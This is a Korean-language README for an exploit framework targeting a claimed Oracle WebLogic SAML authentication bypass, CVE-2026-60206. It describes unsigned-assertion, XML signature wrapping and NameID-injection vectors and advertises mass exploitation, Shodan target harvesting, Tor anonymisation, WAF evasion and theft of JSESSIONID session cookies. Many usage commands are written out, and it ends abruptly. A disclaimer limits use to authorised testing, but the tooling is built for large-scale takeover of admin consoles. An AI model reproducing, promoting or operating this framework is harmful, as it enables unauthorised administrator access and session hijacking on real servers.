
👾 CVE-2026-60206 - Oracle WebLogic SAML 인증 우회 익스플로잇 프레임워크 ⚡Bash 및 Python 버전. 기능: --detect 안전 점검, --exploit combo/unsigned/xsw/nameid/all, --shodan 통합, --tor 지원, 대량 스캔, JSON/CSV/JSONL 출력, 쿠키 검증. 🛡️ CVSS 9.9 치명적 - 윤리적으로 사용하고, 법을 준수하세요. 🔒

익스플로잇 프레임워크 및 대량 스캐너
승인된 보안 테스트 전용입니다.
이 도구는 교육 및 승인된 침투 테스트 목적으로만 제공됩니다.
저자와 기여자는 이 소프트웨어의 오용 또는 피해에 대해 책임을 지지 않습니다. 사용자는 테스트 전에 대상 소유자로부터 명시적인 서면 허가를 받았는지 전적으로 책임집니다. 허가되지 않은 컴퓨터 시스템 접근은 컴퓨터 사기 및 남용법(CFAA) 및 전 세계의 유사 법률에 따라 불법입니다.
이 소프트웨어를 사용함으로써 귀하는 다음 사항에 동의하게 됩니다:
⚠️ 경고: 이 취약점은 실제 환경에서 적극적으로 악용되고 있습니다. 허가되지 않은 사용은 심각한 법적 결과를 초래할 수 있습니다.
CVE-2026-60206은 Oracle WebLogic Server의 SAML(Security Assertion Markup Language) 구현에서 발생하는 치명적인 인증되지 않은 인증 우회 취약점입니다. 원격 공격자는 유효한 자격 증명 없이 SAML 인증을 우회하고 WebLogic 콘솔에 대한 관리자 액세스 권한을 얻을 수 있습니다.
SAML 인젝션: 이 취약점은 SAML 어서션(assertion)의 부적절한 검증에서 비롯됩니다. 공격자는 인증 검사를 우회하는 악의적인 SAML 응답을 제작할 수 있습니다.
서명 우회: 이 취약점은 XML 서명 래핑(XSW) 공격을 통해 XML 서명 검증을 우회할 수 있게 합니다. 공격자는 합법적인 서명으로 악의적인 어서션을 감쌀 수 있습니다.
NameID 조작: 공격자는 주석을 삽입하거나 NameID 필드를 조작하여 권한 있는 사용자로 위장할 수 있습니다.
관리자 액세스: 성공적인 악용 시 공격자에게 WebLogic Server 콘솔에 대한 전체 제어 권한을 가진 관리자 액세스 권한이 부여됩니다.
| 속성 | 값 |
|---|---|
| 📅 발견 시기 | 2026년 7월 (Oracle CPU) |
| ⚠️ CVSS 점수 | 9.9 (치명적) |
| 📋 CISA KEV | 2026년 7월 21일 추가됨 |
| 🎯 영향받는 제품 | Oracle WebLogic Server (Fusion Middleware) |
| 🔄 수정 버전 | Oracle CPU 2026년 7월 |
| 🔓 인증 | 필요 없음 (Pre-Auth) |
| 🌍 실제 악용 | 야생에서 확인됨 (2026년 7월) |
완전한 교육용 멀티-익스플로잇은 여러 SAML 공격 벡터를 연결하여 인증 우회를 달성하며, 대량 스캐닝, 쿠키 및 관리자 액세스를 위한 고급 기능을 제공합니다.
| 기능 | 설명 |
|---|---|
| 🚀 멀티-벡터 익스플로잇 | 7가지 공격 벡터: unsigned, xsw_v1-4, nameid, combo |
| 💻 대량 스캐닝 | 스레드 풀(Python) / FIFO(Bash) 기반 동시 스캐닝 |
| 🔐 쿠키 탈취 | 세션 하이재킹을 위한 JSESSIONID 탈취 |
| 👑 관리자 콘솔 액세스 | WebLogic 콘솔에 대한 전체 관리자 액세스 |
| 📁 버전 탐지 | WebLogic 버전 및 취약점 상태 탐지 |
| 🌐 배치 스캐닝 | 스레딩을 통한 다중 대상 대량 익스플로잇 |
| 🎯 안전한 탐지 | 비침습적 취약점 확인을 위한 선택적 --detect 플래그 |
| 🧩 Shodan 통합 | Shodan 검색에서 직접 대상 로드 |
| 🔍 Tor 지원 | Tor 프록시로 스캐닝 익명화 |
| 📊 다중 출력 형식 | JSON, CSV, JSONL 스트리밍 출력 |
| 🪟 크로스 플랫폼 | Linux, macOS, BSD, Alpine, WSL 지원 |
| 🔒 스레드 안전 | 동시 작업을 위한 잠금 메커니즘 사용 |
| 📋 자동 세션 저장 | 추후 사용을 위한 성공적인 쿠키 저장 |
| ⚙️ WAF 우회 | User-Agent 순환 및 무작위 지연 |
| 벡터 | 설명 |
|---|---|
unsigned | 서명 없는 인증되지 않은 SAML 어서션 |
xsw_v1 | XML 서명 래핑 - 다중 어서션 |
xsw_v2 | XSW - 봉합(enveloped) 서명 우회 |
xsw_v3 | XSW - 네임스페이스 조작 |
xsw_v4 | XSW - 다중 어서션 인젝션 |
nameid | NameID 주석 인젝션 |
combo | 결합 공격 (unsigned + XSW + NameID) |
--detect)안전한 검증기는 유해한 페이로드를 실행하거나 시스템 변경을 수행하지 않고 비침습적 취약점 탐지를 수행합니다.
| 기능 | 설명 |
|---|---|
| 🔍 WebLogic 탐지 | LoginForm.jsp를 통해 WebLogic 인스턴스 식별 |
| 📊 버전 탐지 | 특정 WebLogic 버전 및 패치 수준 탐지 |
| 🧪 SAML 엔드포인트 발견 | SAML ACS 엔드포인트 테스트 |
| 🔒 비침습적 | 취약한 버전만 식별 |
| 📋 JSON/CSV 출력 | 보고를 위한 결과 내보내기 |
| 🔄 대량 스캐닝 | 스레딩 지원으로 다중 대상 스캔 |
curl (Bash 버전용)pip (requests 라이브러리용, Python 버전)# Python version
pip install requests urllib3
# Optional: Shodan support
pip install shodan
# Bash version: curl only (no additional dependencies)
[!NOTE] Bash 버전은
curl만으로 작동하며 외부 종속성이 없습니다. Python 버전은requests와urllib3가 필요합니다(선택 사항: Shodan 통합을 위한shodan).
exploit.py)# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin
# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v
# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json
# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv
# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit
# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20
# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl
# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json
# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0
# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify
# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin
# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json
# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20
# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json
# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl
# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify
# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json
# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin
# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt
# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify
# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080
| Oracle WebLogic 버전 | 상태 |
|---|---|
| 12.2.1.4.0 | 🔴 취약 |
| 14.1.1.0.0 | 🔴 취약 |
| 14.1.2.0.0 | 🔴 취약 |
| 15.1.1.0.0 | 🔴 취약 |
| 기타 버전 | Oracle CPU 2026년 7월 확인 |
⚠️ 중요: 이 취약점은 자체 호스팅 WebLogic Server 배포에 영향을 미칩니다. Oracle CPU 2026년 7월을 즉시 적용하세요.
이 취약점은 WebLogic의 SAML 구현이 제대로 검증하지 못하는 악의적인 SAML 응답을 제작하여 공격자가 SAML 인증을 우회할 수 있게 합니다.
취약한 엔드포인트: